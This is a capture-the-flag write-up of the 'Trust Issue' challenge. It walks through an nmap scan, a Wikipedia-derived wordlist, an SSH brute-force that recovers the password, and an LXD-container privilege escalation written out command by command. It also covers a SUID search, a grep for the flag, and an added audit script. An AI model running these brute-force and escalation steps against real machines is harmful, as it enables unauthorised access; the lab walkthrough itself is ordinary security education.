Trust Issue — ShunyaCTF{Finals}
Trust Issue Points-999
(Exact description I am unable to get now. But it said something like this)
Description
Meet aalu.
His friend told him to put a strong password on his ssh server and shared a Wikipedia article on munged password. Poor aalu was drunk and put a random word from the article as his password. Fortunately for him, the password was at least 8 chars long. Go rock him, shock him.
Try to scan after 15 min of the machine start
(Most people couldn't find port 420 because, I guess, it was only started after some time.)
nmap -T4 -p- -sV -oN nmap/intial $ip
Output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
420/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
Then I simply copied the whole page, pasted it into ChatGPT, and
wrote a prompt like "make a wordlist from these words and add 123 at the end of every word".
It made me that password wordlist in just a minute (I have seen many of the players using the cewl tool).
I understand that ChatGPT doesn’t always function perfectly according to my needs. However, I have always relied on it as my Plan A. I ran the command and waited for the output, but it didn’t provide the result I expected.
cewl https://en.wikipedia.org/wiki/Munged_password -w wordlists0.txt -m 8 --with-numbers -d 0
But ChatGPT rocks, everyone shocks 🥳
python3 cerbrutus.py $ip -p 420 SSH -u "aalu" -P /home/user/CTF/trustIssue/wordlist.txt
Now I have the password:
protection123
ssh aalu@$ip -p 420
Now there were 2 ways to get root access
# Method 1 — ( That’s Not the intended way to Solve that Lab )
{ In that CTF I solved it this way; it took me just 1 or 2 minutes }
LXD
LXD is a next generation system container and virtual machine manager. It offers a user experience similar to virtual machines but using Linux containers instead. It’s image based with pre-made images available for a wide number of Linux distributions and is built around a very powerful, yet pretty simple, REST API.
groups
If the output shows that you are a member of the lxd group, this method works.
With this method the machine does not require internet access.
Download this to our Kali machine:
python -m http.server 8080
Victim machine
wget http://IP:8080/alpine-v*.**.tar.gz
lxd init
Press Enter at every question to accept the defaults
lxc image import ./alpine-v*.**.tar.gz --alias privesc
To check that the image was imported:
lxc image list
lxc init privesc privesc-container -c security.privileged=true
to check
lxc list
lxc config device add privesc-container mydevice disk source=/ path=/mnt/root recursive=true
lxc start privesc-container
To check, the container state should now be RUNNING:
lxc list
lxc exec privesc-container /bin/sh
Now You are root
Before finding the flag, I wanted a normal root shell so that I could stay persistent on this machine. The simple way is to edit the etc/shadow file, but remember that nano and vim do not work in this LXD container, so I needed a second plan.
How to get flag.txt on this machine is covered in the Method 2 part ;)
# Method 2
SUID (Set User ID)
find / -type f -perm -4000 2>/dev/null
womp -h
Boom!!! Now You are Root :)
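A defender-side check for the two misconfigurations used above (a user in the lxd group and an unexpected SUID binary), added here as an example and not part of the original write-up. The group list, the allowlist, the womp path and the sample data are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added audit example, not from the original write-up.
# Flags the two root paths used above: lxd group membership and a stray SUID file.

# Assumed list of groups whose members can become root on the host.
ROOT_EQUIV_GROUPS="lxd docker"

# Assumed SUID allowlist for this example, one path per line.
SUID_ALLOWLIST="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su"

# stdin: lines in /etc/group format. stdout: "group:user" per risky membership.
root_equiv_members() {
    awk -F: -v gl="$ROOT_EQUIV_GROUPS" '
        BEGIN { n = split(gl, g, " "); for (i = 1; i <= n; i++) want[g[i]] = 1 }
        ($1 in want) && $4 != "" {
            m = split($4, u, ",")
            for (j = 1; j <= m; j++) print $1 ":" u[j]
        }'
}

# stdin: SUID file paths, one per line. stdout: paths missing from the allowlist.
unexpected_suid() {
    grep -Fvx -e "$SUID_ALLOWLIST" || true
}

# Constructed sample data (not taken from the CTF machine).
sample_groups() {
    printf '%s\n' 'root:x:0:' 'sudo:x:27:admin' 'lxd:x:116:aalu,admin' 'docker:x:998:'
}
sample_suid() {
    printf '%s\n' /usr/bin/passwd /usr/bin/sudo /opt/example/womp
}

echo "Root-equivalent group members:"
sample_groups | root_equiv_members
echo "SUID files outside the allowlist:"
sample_suid | unexpected_suid

# On a live host, feed real data instead:
#   getent group | root_equiv_members
#   find / -xdev -type f -perm -4000 2>/dev/null | unexpected_suid
```

Users whose primary GID is one of these groups do not appear in the member field, so on a live host also compare the GID column of /etc/passwd.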
Flag.txt
So this part was like this: there are 3 types of files. In the first type, shunyaCTF{iaminsane fakeflag} was written; in the second type, random gibberish was written; and the third type contains our flag.
So I noticed that some files contain the text shunyaCTF and the others don't. For now we read only the files that contain the shunyaCTF text, and we remove the most common string, iaminsane fakeflag, from our results by using the grep command.
grep -r 'shunya' | grep -v 'fakeflag'
-r, --recursive
Read all files under each directory, recursively,
following symbolic links only if they are on the command
line. Note that if no file operand is given, grep
searches the working directory. This is equivalent to the
-d recurse option.
-v, --invert-match
Invert the sense of matching, to select non-matching
lines.
shunyaCTF{1_10V3_h0n3y}
~ Jay Tiwari [PaiN05]
I hope you understood how to solve it.
If anyone has doubts, contact me on
Instagram:
https://www.instagram.com/__jayyyy21__/